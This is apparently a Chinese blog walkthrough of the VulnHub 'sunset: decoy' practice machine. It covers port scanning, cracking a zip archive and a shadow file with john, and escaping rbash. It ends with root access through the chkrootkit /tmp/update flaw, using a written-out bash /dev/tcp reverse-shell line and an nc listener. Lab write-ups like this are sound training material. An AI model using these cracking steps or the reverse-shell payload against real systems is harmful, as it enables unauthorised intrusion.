首页 > 其他分享 >靶机练习8: decoy

靶机练习8: decoy

时间:2023-03-24 16:44:17浏览次数:66  
标签:sbin save chkrootkit -- decoy 练习 靶机 txt

靶机地址

https://www.vulnhub.com/entry/sunset-decoy,505/

信息收集

全端口扫描发现服务,并扫描其版本

sudo masscan -p1-65535,U:1-65535 172.16.33.40 --rate=5000 -e tun0
sudo nmap -p22,80 -sV -A 172.16.33.40
端口 服务 利用点 结果
80 apache save.zip 待定
22 Ssh 暂无,必要时考虑爆破 暂无

访问80端口,将save.zip下载下来

使用john破解压缩包密码,得到etc

zip2john save.zip > save.hash
john save.hash --wordlist=rockyou.txt

etc中有passwdshadow,可以结合破解

unshadow passwd shadow > unshadow
john --rules --wordlists=rockyou.txt unshadow

可以破解出某个账户 ( 账户名一长串,不想打了,以guest代替吧!) 的密码为server

ssh进去后查看文件

后期截图,有一些是我后面传上去的文件,可以看到有普通用户proof文件user.txt,但由于shell为rbash,需要绕过

Get shell

shellrbash, 所以需要绕过

-t "bash --no-profile" # ssh后面加

进去以后查看命令无法使用,查看环境变量,echo $PATH

当前环境变量为家目录,无法直接使用命令

# 改为
PATH=/usr/local/sbin/:/usr/sbin/bin/:/usr/sbin/:/usr/bin/://sbin/:/bin/

可查看user.txt

提权

上传linpeas.sh, 赋予执行权限后运行

可疑提权向量(尽量忽略内核提权):

数据库配置文件: /etc/mysql/mariadb.cnf 可读

suid权限:

pkexec 利用没成功
sudo  查看版本是否有漏洞  漏洞需要管理员权限修改文件

SV502/log.txt

发现SV502/logs/log.txt 日志文件里有提到chkrootkit,该文件用于检测系统中是否被安装rootkit的

主目录中存在honeypot.decoy,为root用户所有,尝试运行

5AV扫描,猜测跟chkrootkit有关,尝试运行

使用ps aux | grep chkrootkit,知道chkrootkitroot运行

使用searchsploit chkrootkit查看利用方法

利用方法很简单

echo "bash -c 'exec bash -i &>/dev/tcp/10.8.0.86/4444 <&1'" > /tmp/update
./honeypot.decoy

#kali
nc -nvlp 4444

标签:sbin,save,chkrootkit,--,decoy,练习,靶机,txt
From: https://www.cnblogs.com/cha0s32/p/17252542.html

相关文章

  • 靶机联系7:LOLY
    靶机地址https://www.vulnhub.com/entry/loly-1,538/信息收集扫描全端口,进行服务发现nmap-n-v-sS-max-retries=0-p-172.16.33.25发现只有80端口的web服务进......
  • 天梯赛练习题 L3-003 社交集群 (简单并查集)
    https://pintia.cn/problem-sets/994805046380707840/exam/problems/994805053141925888题目大意:当你在社交网络平台注册时,一般总是被要求填写你的个人兴趣爱好,以便找到......
  • 天梯赛练习题 L3-002 特殊堆栈(stl)
    https://pintia.cn/problem-sets/994805046380707840/exam/problems/994805053695574016输入样例:17PopPeekMedianPush3PeekMedianPush2PeekMedianPush1PeekM......
  • 3月日常练习题-1
    目录一、找1二、挑兵挑将三、水位线四、小码哥的跳棋游戏五、小码哥与机器人六、银行账户七、数字问题八、字符串的解码九、斐波那契,但是是字符串十、最大的平均值十一、数......
  • Vulnhub之Panabee靶机详细测试过程
    Panabee识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|......
  • Python小练习:绘制散点图并添加基线
    Python小练习:绘制散点图并添加基线作者:凯鲁嘎吉-博客园 http://www.cnblogs.com/kailugaji/1. plot_scatter_test.py1#-*-coding:utf-8-*-2#Author:凯鲁......
  • Stream流方法的一些简单练习题
    Stream流练习题1、数据过滤定义一个集合,并添加一些整数1,2,3,4,5,6,7,8,9,10过滤奇数,只留下偶数并将结果保存起来。/***@author戒爱学Java*@date2023/3/239:......
  • Vulnhub之Photographer靶机详细测试过程
    Photographer识别目标主机IP地址sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|ScreenView:UniqueHosts......
  • Python相关练习
    我又来练习啦!1、将一个列表的内容复制到另外一个列表里面2、输出九九乘法表3、统计1到100的和4、转战PTA作业(函数篇)--使用函数输出指定范围内Fibonacci数的个数......
  • Vulnhub:Mr-Robot:1靶机
    kali:192.168.111.111靶机:192.168.111.237信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.237访问robots.txt,发现两个文件发现fsocity.d......